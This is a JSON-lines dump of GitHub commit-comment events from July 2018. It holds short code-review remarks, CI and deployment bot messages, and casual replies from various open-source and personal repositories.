{"id":"7991989773","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29771597,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-19T22:37:32Z","updated_at":"2018-07-19T22:37:32Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-19T22:37:32Z"}
{"id":"7991993296","type":"CommitCommentEvent","actor":{"login":"jaresan"},"repo":{"name":"blackuy/react-native-twilio-video-webrtc"},"payload":{"comment":{"id":29771607,"position":null,"line":null,"path":null,"commit_id":"1e27e37c58d73c66dcdc4ec32ecab10ad7cf0187","created_at":"2018-07-19T22:38:35Z","updated_at":"2018-07-19T22:38:35Z","author_association":"NONE","body":"No problem, just learned something new and will never underestimate `package-lock.json` again 👍 "}},"created_at":"2018-07-19T22:38:35Z"}
{"id":"7991996129","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"DarSky24/library"},"payload":{"comment":{"id":29771610,"position":22,"line":18,"path":"src/test/java/springframework/library/service/impl/GenreServiceImplTest.java","commit_id":"6231e3b8af09694929ecbcd1e9ec65698e5e1613","created_at":"2018-07-19T22:39:28Z","updated_at":"2018-07-19T22:39:28Z","author_association":"NONE","body":"Только тогда уж GenreDao - интерфейс нужен."}},"created_at":"2018-07-19T22:39:28Z"}
{"id":"7991996730","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"DarSky24/library"},"payload":{"comment":{"id":29771612,"position":53,"line":48,"path":"src/test/java/springframework/library/service/impl/GenreServiceImplTest.java","commit_id":"6231e3b8af09694929ecbcd1e9ec65698e5e1613","created_at":"2018-07-19T22:39:40Z","updated_at":"2018-07-19T22:39:40Z","author_association":"NONE","body":"круто, да тестировать?)"}},"created_at":"2018-07-19T22:39:40Z"}
{"id":"7991997032","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"PIH/openmrs-pwa-workflow"},"payload":{"comment":{"id":29771613,"position":15,"line":54,"path":"src/store.js","commit_id":"ea08569781eb0a70295bb5e66e1cf959719ed0a3","created_at":"2018-07-19T22:39:46Z","updated_at":"2018-07-19T22:39:46Z","author_association":"MEMBER","body":"Thanks @cioan !  "}},"created_at":"2018-07-19T22:39:46Z"}
{"id":"7992000310","type":"CommitCommentEvent","actor":{"login":"quocneo"},"repo":{"name":"haloplatform/go-haloplatform"},"payload":{"comment":{"id":29771621,"position":101,"line":1021,"path":"core/tx_pool.go","commit_id":"963cf738d1b47cd477830faf38e454b0a1a467cf","created_at":"2018-07-19T22:40:51Z","updated_at":"2018-07-19T22:40:51Z","author_association":"CONTRIBUTOR","body":"It's from another PR #16843 for fixing deadlock of #16720\r\n\r\nhttps://github.com/ethereum/go-ethereum/pull/16843"}},"created_at":"2018-07-19T22:40:51Z"}
{"id":"7992000870","type":"CommitCommentEvent","actor":{"login":"crishoj"},"repo":{"name":"crishoj/color-thief-php"},"payload":{"comment":{"id":29771622,"position":4,"line":24,"path":"tests/ColorThiefTest.php","commit_id":"f9f215c95b5740c3b9a26bacfffa00c31a9a38f1","created_at":"2018-07-19T22:41:03Z","updated_at":"2018-07-19T22:41:03Z","author_association":"OWNER","body":"This was an on-screen sample using Apple's \"Digital Color Meter\"..."}},"created_at":"2018-07-19T22:41:03Z"}
{"id":"7992004518","type":"CommitCommentEvent","actor":{"login":"evgom"},"repo":{"name":"crisebrain/C3"},"payload":{"comment":{"id":29771632,"position":3,"line":2,"path":"Sessions/file.txt","commit_id":"db6d3a2995529b5fea641f7269f04b3f7d6f35ef","created_at":"2018-07-19T22:42:15Z","updated_at":"2018-07-19T22:42:15Z","author_association":"COLLABORATOR","body":"¿Qué? ¿Porqué ese monito?"}},"created_at":"2018-07-19T22:42:15Z"}
{"id":"7992006194","type":"CommitCommentEvent","actor":{"login":"slipnir"},"repo":{"name":"gibsn/technochat"},"payload":{"comment":{"id":29771633,"position":null,"line":null,"path":null,"commit_id":"64d3c8fcd3754aa7781fe9c0d9447f861cce5440","created_at":"2018-07-19T22:42:43Z","updated_at":"2018-07-19T22:42:43Z","author_association":"COLLABORATOR","body":"default* )"}},"created_at":"2018-07-19T22:42:43Z"}
{"id":"7992015352","type":"CommitCommentEvent","actor":{"login":"quocneo"},"repo":{"name":"haloplatform/go-haloplatform"},"payload":{"comment":{"id":29771658,"position":null,"line":null,"path":null,"commit_id":"963cf738d1b47cd477830faf38e454b0a1a467cf","created_at":"2018-07-19T22:45:37Z","updated_at":"2018-07-19T22:45:37Z","author_association":"CONTRIBUTOR","body":"The main update is merged from https://github.com/ethereum/go-ethereum/pull/16720. Some other modules (not TxPool broadcasting) will be affected\r\n- Raft minter: only change to new event type because it doesn't use the data from event like `miner/worker.go`\r\n- `/eth/filter`: change for new event type.\r\n- TxReplay (Halo network feature): change to raise the event with a batch of Txs.\r\n"}},"created_at":"2018-07-19T22:45:37Z"}
{"id":"7992022752","type":"CommitCommentEvent","actor":{"login":"aboubker"},"repo":{"name":"syria051/aldery"},"payload":{"comment":{"id":29771674,"position":null,"line":null,"path":null,"commit_id":"54fb75a91d8d31f6d1d5eb9c359280f6a02ee61b","created_at":"2018-07-19T22:48:01Z","updated_at":"2018-07-19T22:48:01Z","author_association":"CONTRIBUTOR","body":"oo"}},"created_at":"2018-07-19T22:48:01Z"}
{"id":"7992025598","type":"CommitCommentEvent","actor":{"login":"mattsinc"},"repo":{"name":"patflick/miopen-benchmark"},"payload":{"comment":{"id":29771680,"position":13,"line":8,"path":"alexnet.cpp","commit_id":"eebcfca6ca947734dbda764f69aebcce0fae2b95","created_at":"2018-07-19T22:49:02Z","updated_at":"2018-07-19T22:49:02Z","author_association":"NONE","body":"typo"}},"created_at":"2018-07-19T22:49:02Z"}
{"id":"7992027986","type":"CommitCommentEvent","actor":{"login":"bubach"},"repo":{"name":"garrettw/Dice"},"payload":{"comment":{"id":29771690,"position":null,"line":null,"path":null,"commit_id":"58d1bcca333dbdd71eaa2cc0c7538b8fbd51f318","created_at":"2018-07-19T22:49:51Z","updated_at":"2018-07-19T22:49:51Z","author_association":"NONE","body":"Hi!  Just wanted to drop by and thank you for maintaining this fork - I did some heavy modifications on Dice myself and this repo helped me get my refactoring started.   One of my less clever moves while refusing to scale down on functionality yet still support older PHP 5 versions was to find a way around the Reflection functionality only available on > 7.0... Might as well share my semi-ready solution now that I've spend better part of the day on it - even if you might have different priorities for this version. \r\nhttps://gist.github.com/bubach/8b67b873f649e9d163abbfd90aaab9ef"}},"created_at":"2018-07-19T22:49:51Z"}
{"id":"7992028186","type":"CommitCommentEvent","actor":{"login":"alxmiron"},"repo":{"name":"HiTask/blueprint"},"payload":{"comment":{"id":29771692,"position":null,"line":null,"path":null,"commit_id":"4eab1ca500c17f7534d3cb1a6d83f31127c82bfd","created_at":"2018-07-19T22:49:55Z","updated_at":"2018-07-19T22:49:55Z","author_association":"NONE","body":"<h3>Added Custom Icons: hi-data, hi-exit, hi-reports, hi-settings, hi-settings2</h3>\n\nPreview: <strong><a href='https://423-75619030-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://423-75619030-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://423-75619030-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-19T22:49:55Z"}
{"id":"7992036156","type":"CommitCommentEvent","actor":{"login":"mattsinc"},"repo":{"name":"patflick/miopen-benchmark"},"payload":{"comment":{"id":29771720,"position":9,"line":13,"path":"alexnet.cpp","commit_id":"eebcfca6ca947734dbda764f69aebcce0fae2b95","created_at":"2018-07-19T22:52:33Z","updated_at":"2018-07-19T22:52:33Z","author_association":"NONE","body":"you can probably check this off your list too :)"}},"created_at":"2018-07-19T22:52:33Z"}
{"id":"7992038682","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29771726,"position":null,"line":null,"path":null,"commit_id":"7efbbbadded822165859e4a09c4d92d2d404f37d","created_at":"2018-07-19T22:53:25Z","updated_at":"2018-07-19T22:53:25Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1694 of 1694 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7efbbbadded822165859e4a09c4d92d2d404f37d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7efbbbadded822165859e4a09c4d92d2d404f37d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7efbbbadded822165859e4a09c4d92d2d404f37d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-19T22:53:25Z"}
{"id":"7992043721","type":"CommitCommentEvent","actor":{"login":"bcdj"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29771738,"position":21,"line":21,"path":"mlmodelinterpreter/MLModelInterpreterExampleObjC/AppDelegate.m","commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-19T22:55:09Z","updated_at":"2018-07-19T22:55:09Z","author_association":"NONE","body":"If the extension is empty, do you still need it?"}},"created_at":"2018-07-19T22:55:09Z"}
{"id":"7992047107","type":"CommitCommentEvent","actor":{"login":"jrgm"},"repo":{"name":"mozilla/fxa-email-service"},"payload":{"comment":{"id":29771744,"position":null,"line":null,"path":null,"commit_id":"b69cfb5365629bbd2923e2b6a99f07186ad071ce","created_at":"2018-07-19T22:56:17Z","updated_at":"2018-07-19T22:56:17Z","author_association":"MEMBER","body":"So, it's FXA_EMAIL_PORT. Ok."}},"created_at":"2018-07-19T22:56:17Z"}
{"id":"7992047336","type":"CommitCommentEvent","actor":{"login":"bcdj"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29771745,"position":38,"line":38,"path":"mlmodelinterpreter/MLModelInterpreterExampleObjC/ModelInterpreterManager.m","commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-19T22:56:22Z","updated_at":"2018-07-19T22:56:22Z","author_association":"NONE","body":"why is this empty category needed?"}},"created_at":"2018-07-19T22:56:22Z"}
{"id":"7992051792","type":"CommitCommentEvent","actor":{"login":"bcdj"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29771754,"position":49,"line":49,"path":"mlmodelinterpreter/MLModelInterpreterExampleObjC/ModelInterpreterManager.m","commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-19T22:57:55Z","updated_at":"2018-07-19T22:57:55Z","author_association":"NONE","body":"nit: maybe replace \"sampleapps\" with \"quickstart\"?"}},"created_at":"2018-07-19T22:57:55Z"}
{"id":"7992054940","type":"CommitCommentEvent","actor":{"login":"LeonardMeagher2"},"repo":{"name":"SurLaTable/slt-ui"},"payload":{"comment":{"id":29771762,"position":5,"line":6,"path":"builder/async.js","commit_id":"f01522aa62c6514bff24c94792235c4eb3afb642","created_at":"2018-07-19T22:58:55Z","updated_at":"2018-07-19T22:58:55Z","author_association":"COLLABORATOR","body":"I've changed it a bit more"}},"created_at":"2018-07-19T22:58:55Z"}
{"id":"7992056908","type":"CommitCommentEvent","actor":{"login":"bradharding"},"repo":{"name":"bradharding/doomretro"},"payload":{"comment":{"id":29771767,"position":null,"line":null,"path":null,"commit_id":"1c624860020fe5a517bf83b4d87ace9374cb86fe","created_at":"2018-07-19T22:59:28Z","updated_at":"2018-07-19T22:59:28Z","author_association":"OWNER","body":"Does this still happen if you use -nosound on the command line?"}},"created_at":"2018-07-19T22:59:28Z"}
{"id":"7992059434","type":"CommitCommentEvent","actor":{"login":"alenasf"},"repo":{"name":"alenasf/JavaAppiumAutomation2"},"payload":{"comment":{"id":29771783,"position":null,"line":null,"path":null,"commit_id":"ad98b8ca2f726d7b8abb871b47918974ac663a3a","created_at":"2018-07-19T23:00:13Z","updated_at":"2018-07-19T23:00:13Z","author_association":"OWNER","body":"CoreTestCase"}},"created_at":"2018-07-19T23:00:13Z"}
{"id":"7992060726","type":"CommitCommentEvent","actor":{"login":"biodavis"},"repo":{"name":"biodavis/website"},"payload":{"comment":{"id":29771802,"position":3,"line":12,"path":"README.md","commit_id":"b4197ebeee5d002c994349d495b2c6b7c38dca37","created_at":"2018-07-19T23:00:33Z","updated_at":"2018-07-19T23:00:33Z","author_association":"OWNER","body":"## What is this for and there is a **__misspelling__**\r\n"}},"created_at":"2018-07-19T23:00:33Z"}
{"id":"7992063130","type":"CommitCommentEvent","actor":{"login":"biodavis"},"repo":{"name":"biodavis/website"},"payload":{"comment":{"id":29771820,"position":null,"line":null,"path":null,"commit_id":"b4197ebeee5d002c994349d495b2c6b7c38dca37","created_at":"2018-07-19T23:01:19Z","updated_at":"2018-07-19T23:01:19Z","author_association":"OWNER","body":"I am not sure of this whole commit on July 19, lecutre 89"}},"created_at":"2018-07-19T23:01:19Z"}
{"id":"7992067104","type":"CommitCommentEvent","actor":{"login":"bcdj"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29771838,"position":23,"line":23,"path":"mlmodelinterpreter/MLModelInterpreterExampleObjC/ModelInterpreterManager.h","commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-19T23:02:39Z","updated_at":"2018-07-19T23:02:39Z","author_association":"NONE","body":"Don't feel it's really necessary to introduce this ModelManaging protocol.  We could just use the FIRModelManager interface."}},"created_at":"2018-07-19T23:02:39Z"}
{"id":"7992070400","type":"CommitCommentEvent","actor":{"login":"wpolicarpo"},"repo":{"name":"matthewdunbar/activerecord-sqlserver-adapter"},"payload":{"comment":{"id":29771850,"position":33,"line":71,"path":"lib/active_record/connection_adapters/sqlserver/type/time_value_fractional.rb","commit_id":"67317b316506388d17ec51e56528430323c3f822","created_at":"2018-07-19T23:03:43Z","updated_at":"2018-07-19T23:03:43Z","author_association":"NONE","body":"Tests were failing due to rounding issues with `Float`."}},"created_at":"2018-07-19T23:03:43Z"}
{"id":"7992072008","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29771854,"position":null,"line":null,"path":null,"commit_id":"d292085d4449110050d9978d34fcf437d78ad436","created_at":"2018-07-19T23:04:15Z","updated_at":"2018-07-19T23:04:15Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-152](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-152).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-152-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-19T23:04:15Z"}
{"id":"7992074038","type":"CommitCommentEvent","actor":{"login":"daztucker"},"repo":{"name":"openbsd/src"},"payload":{"comment":{"id":29771864,"position":null,"line":null,"path":null,"commit_id":"31c76a1f562c0d7d634bf0131bab8c2de524814c","created_at":"2018-07-19T23:05:01Z","updated_at":"2018-07-19T23:05:01Z","author_association":"CONTRIBUTOR","body":"thanks, fixed upstream, it'll get pulled in next time we sync"}},"created_at":"2018-07-19T23:05:01Z"}
{"id":"7992075353","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29771867,"position":null,"line":null,"path":null,"commit_id":"46611d96788f771ee1fce11b164d9906d5af371e","created_at":"2018-07-19T23:05:25Z","updated_at":"2018-07-19T23:05:25Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-229](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-229).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-229-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-19T23:05:25Z"}
{"id":"7992075984","type":"CommitCommentEvent","actor":{"login":"bcdj"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29771871,"position":78,"line":78,"path":"mlmodelinterpreter/MLModelInterpreterExampleObjC/ModelInterpreterManager.m","commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-19T23:05:37Z","updated_at":"2018-07-19T23:05:37Z","author_association":"NONE","body":"nit: all the \"self.xyz\" property accessors should be replaced by \"_xyz\" ivar accessors in this initializer."}},"created_at":"2018-07-19T23:05:37Z"}
{"id":"7992076197","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29771872,"position":null,"line":null,"path":null,"commit_id":"2775b15e40796870779ff44f1d74e2c56eb2104c","created_at":"2018-07-19T23:05:41Z","updated_at":"2018-07-19T23:05:41Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-MacOS-10.9-clang: Tests Failed (1385 of 2948 tests passed, 1 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2775b15e40796870779ff44f1d74e2c56eb2104c-PR6846-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2775b15e40796870779ff44f1d74e2c56eb2104c-PR6846-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-46.98%25-red.png)</a> \n"}},"created_at":"2018-07-19T23:05:41Z"}
{"id":"7992077617","type":"CommitCommentEvent","actor":{"login":"dgrammatiko"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29771881,"position":7,"line":20,"path":"media/com_contact/js/admin-contacts-modal.es6.js","commit_id":"3e1f27b01f7145771b8c49942dfd79c6353db105","created_at":"2018-07-19T23:06:09Z","updated_at":"2018-07-19T23:06:09Z","author_association":"MEMBER","body":"probably\r\n```js\r\nwindow.parent.Joomla.Modal.getCurrent().close();\r\n```"}},"created_at":"2018-07-19T23:06:09Z"}
{"id":"7992078872","type":"CommitCommentEvent","actor":{"login":"temrich"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29771883,"position":23,"line":23,"path":"mlmodelinterpreter/MLModelInterpreterExampleObjC/ModelInterpreterManager.h","commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-19T23:06:35Z","updated_at":"2018-07-19T23:06:35Z","author_association":"NONE","body":"This was introduced to make it easier for setting up unit tests, so shouldn't need it for the Quickstart."}},"created_at":"2018-07-19T23:06:35Z"}
{"id":"7992081923","type":"CommitCommentEvent","actor":{"login":"bcdj"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29771889,"position":102,"line":102,"path":"mlmodelinterpreter/MLModelInterpreterExampleObjC/ModelInterpreterManager.m","commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-19T23:07:42Z","updated_at":"2018-07-19T23:07:42Z","author_association":"NONE","body":"nit: All the ivar accessors \"_xyz\" in the non-initializer methods should be replaced by the \"self.xyz\" property accessors.  Here and everywhere below in this file."}},"created_at":"2018-07-19T23:07:42Z"}
{"id":"7992089661","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29771906,"position":99,"line":57,"path":"contracts/Splitter.sol","commit_id":"e7bf72a4462d74ff70a26166e95ef9a732f0dace","created_at":"2018-07-19T23:10:22Z","updated_at":"2018-07-19T23:10:22Z","author_association":"OWNER","body":"@xavierlepretre this is to grab the relevant allowance, which is the amount that i then transfer.\r\nnote that i do not have a mapping (intentionally - per Rob's request for this iteration), so instead am using separate int types in storage. "}},"created_at":"2018-07-19T23:10:22Z"}
{"id":"7992091697","type":"CommitCommentEvent","actor":{"login":"FarrukhSafarov"},"repo":{"name":"FarrukhSafarov/homework2"},"payload":{"comment":{"id":29771910,"position":null,"line":null,"path":null,"commit_id":"cffd13f3ec24d3f7b728088f4a509e1e37354f21","created_at":"2018-07-19T23:11:02Z","updated_at":"2018-07-19T23:11:02Z","author_association":"OWNER","body":"homework2"}},"created_at":"2018-07-19T23:11:02Z"}
{"id":"7992092602","type":"CommitCommentEvent","actor":{"login":"bcdj"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29771912,"position":187,"line":187,"path":"mlmodelinterpreter/MLModelInterpreterExampleObjC/ModelInterpreterManager.m","commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-19T23:11:19Z","updated_at":"2018-07-19T23:11:19Z","author_association":"NONE","body":"nit: please align colons in the 3 lines above"}},"created_at":"2018-07-19T23:11:19Z"}
{"id":"7992094139","type":"CommitCommentEvent","actor":{"login":"janstary"},"repo":{"name":"columbia-irt/rtptools"},"payload":{"comment":{"id":29771915,"position":null,"line":null,"path":null,"commit_id":"b362334560dc1020fddd44587f7a9be189da7d8a","created_at":"2018-07-19T23:11:45Z","updated_at":"2018-07-19T23:11:45Z","author_association":"CONTRIBUTOR","body":"Make `RD_header()` read the `RD_hdr_t` structure, as in `RD_header(in, &hdr, verbose)`,\r\ninstead of reading its individual parts (addr/port, start) into separate variables.\r\nI don't have any simpler way to put it.\r\n\r\n(Also, the `verbose` should be a global, but that's another thing)."}},"created_at":"2018-07-19T23:11:45Z"}
{"id":"7992094484","type":"CommitCommentEvent","actor":{"login":"Bubba"},"repo":{"name":"Bubba/haskell-ide-engine"},"payload":{"comment":{"id":29771916,"position":47,"line":66,"path":"src/Haskell/Ide/Engine/Dispatcher.hs","commit_id":"c756f3a3156caeb1e241415f87c131a68c693266","created_at":"2018-07-19T23:11:53Z","updated_at":"2018-07-19T23:11:53Z","author_association":"OWNER","body":"@alanz: What are your thoughts on this? This should catch cause exceptions to get thrown back to the main thread."}},"created_at":"2018-07-19T23:11:53Z"}
{"id":"7992099532","type":"CommitCommentEvent","actor":{"login":"guoguo12"},"repo":{"name":"guoguo12/billboard-charts"},"payload":{"comment":{"id":29771931,"position":26,"line":125,"path":"billboard.py","commit_id":"fcfc48593e478b011a9ef8c00804354827ebf00e","created_at":"2018-07-19T23:13:42Z","updated_at":"2018-07-19T23:13:42Z","author_association":"OWNER","body":"Yes. There's a unit test for this. "}},"created_at":"2018-07-19T23:13:42Z"}
{"id":"7992101140","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29771937,"position":null,"line":null,"path":null,"commit_id":"cf54e93ea9ec02c35c78dada6ef2214b0195af70","created_at":"2018-07-19T23:14:18Z","updated_at":"2018-07-19T23:14:18Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-229](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-229).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-229-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-19T23:14:18Z"}
{"id":"7992102120","type":"CommitCommentEvent","actor":{"login":"guoguo12"},"repo":{"name":"guoguo12/billboard-charts"},"payload":{"comment":{"id":29771940,"position":26,"line":125,"path":"billboard.py","commit_id":"fcfc48593e478b011a9ef8c00804354827ebf00e","created_at":"2018-07-19T23:14:40Z","updated_at":"2018-07-19T23:14:40Z","author_association":"OWNER","body":"Search for `test_date_rounding`. "}},"created_at":"2018-07-19T23:14:40Z"}
{"id":"7992102215","type":"CommitCommentEvent","actor":{"login":"healygreggatyahoo"},"repo":{"name":"healygreggatyahoo/rimwrapzstore"},"payload":{"comment":{"id":29771941,"position":null,"line":null,"path":null,"commit_id":"39f25cec1c4bab353a5252a9f50fed6e4315f395","created_at":"2018-07-19T23:14:42Z","updated_at":"2018-07-19T23:14:42Z","author_association":"OWNER","body":"Created multidev environment [rimwrapzstore#ci-5](https://dashboard.pantheon.io/sites/a40a5bf0-ca93-4a8a-8c59-d8eb31e91514#ci-5).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-5-rimwrapzstore.pantheonsite.io/)"}},"created_at":"2018-07-19T23:14:42Z"}
{"id":"7992108235","type":"CommitCommentEvent","actor":{"login":"a6676333"},"repo":{"name":"a6676333/a"},"payload":{"comment":{"id":29771957,"position":3,"line":3,"path":"README.md","commit_id":"62a1ba343cdb33c599311a1ac820e798d15bbdd7","created_at":"2018-07-19T23:16:50Z","updated_at":"2018-07-19T23:16:50Z","author_association":"OWNER","body":"dsf"}},"created_at":"2018-07-19T23:16:50Z"}
{"id":"7992109400","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":29771960,"position":null,"line":null,"path":null,"commit_id":"761dafdab3d2695cb1dffc275b6cf760bb477ef2","created_at":"2018-07-19T23:17:15Z","updated_at":"2018-07-19T23:17:15Z","author_association":"CONTRIBUTOR","body":"These SAVEMARK patches are a result of my testing ways of installing Puppy that depend on \"psavemark=\".\r\nThese include the situation where \"psavemark=2\" could be specified as a boot parameter. but the disk contians only 1 partition."}},"created_at":"2018-07-19T23:17:15Z"}
{"id":"7992111273","type":"CommitCommentEvent","actor":{"login":"philjosch"},"repo":{"name":"philjosch/Einsatzplaner"},"payload":{"comment":{"id":29771965,"position":null,"line":null,"path":null,"commit_id":"989183c1e53ce3743f69159f7daac5f08ea7b942","created_at":"2018-07-19T23:17:57Z","updated_at":"2018-07-19T23:17:57Z","author_association":"OWNER","body":"#56 könnte damit zu tun haben"}},"created_at":"2018-07-19T23:17:57Z"}
{"id":"7992111960","type":"CommitCommentEvent","actor":{"login":"patflick"},"repo":{"name":"patflick/miopen-benchmark"},"payload":{"comment":{"id":29771969,"position":9,"line":13,"path":"alexnet.cpp","commit_id":"eebcfca6ca947734dbda764f69aebcce0fae2b95","created_at":"2018-07-19T23:18:13Z","updated_at":"2018-07-19T23:18:13Z","author_association":"OWNER","body":"yeah, that's why i deleted it all =)"}},"created_at":"2018-07-19T23:18:13Z"}
{"id":"7992112114","type":"CommitCommentEvent","actor":{"login":"bcdj"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29771970,"position":null,"line":null,"path":null,"commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-19T23:18:16Z","updated_at":"2018-07-19T23:18:16Z","author_association":"NONE","body":"I added a few comments on this commit.  Thanks!"}},"created_at":"2018-07-19T23:18:16Z"}
{"id":"7992120367","type":"CommitCommentEvent","actor":{"login":"vanfanel"},"repo":{"name":"bradharding/doomretro"},"payload":{"comment":{"id":29771994,"position":null,"line":null,"path":null,"commit_id":"1c624860020fe5a517bf83b4d87ace9374cb86fe","created_at":"2018-07-19T23:21:05Z","updated_at":"2018-07-19T23:21:05Z","author_association":"NONE","body":"@bradharding : Yes. It happens less frequently, but it still happens. Seems reproducible as I said: turn around and around.... and open/close a nearby door repeatedly."}},"created_at":"2018-07-19T23:21:05Z"}
{"id":"7992120984","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29771996,"position":null,"line":null,"path":null,"commit_id":"ac74d25c2dcd7cf885dd4f3e66674fedbb4af0fc","created_at":"2018-07-19T23:21:20Z","updated_at":"2018-07-19T23:21:20Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-141](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-141).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-141-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-19T23:21:20Z"}
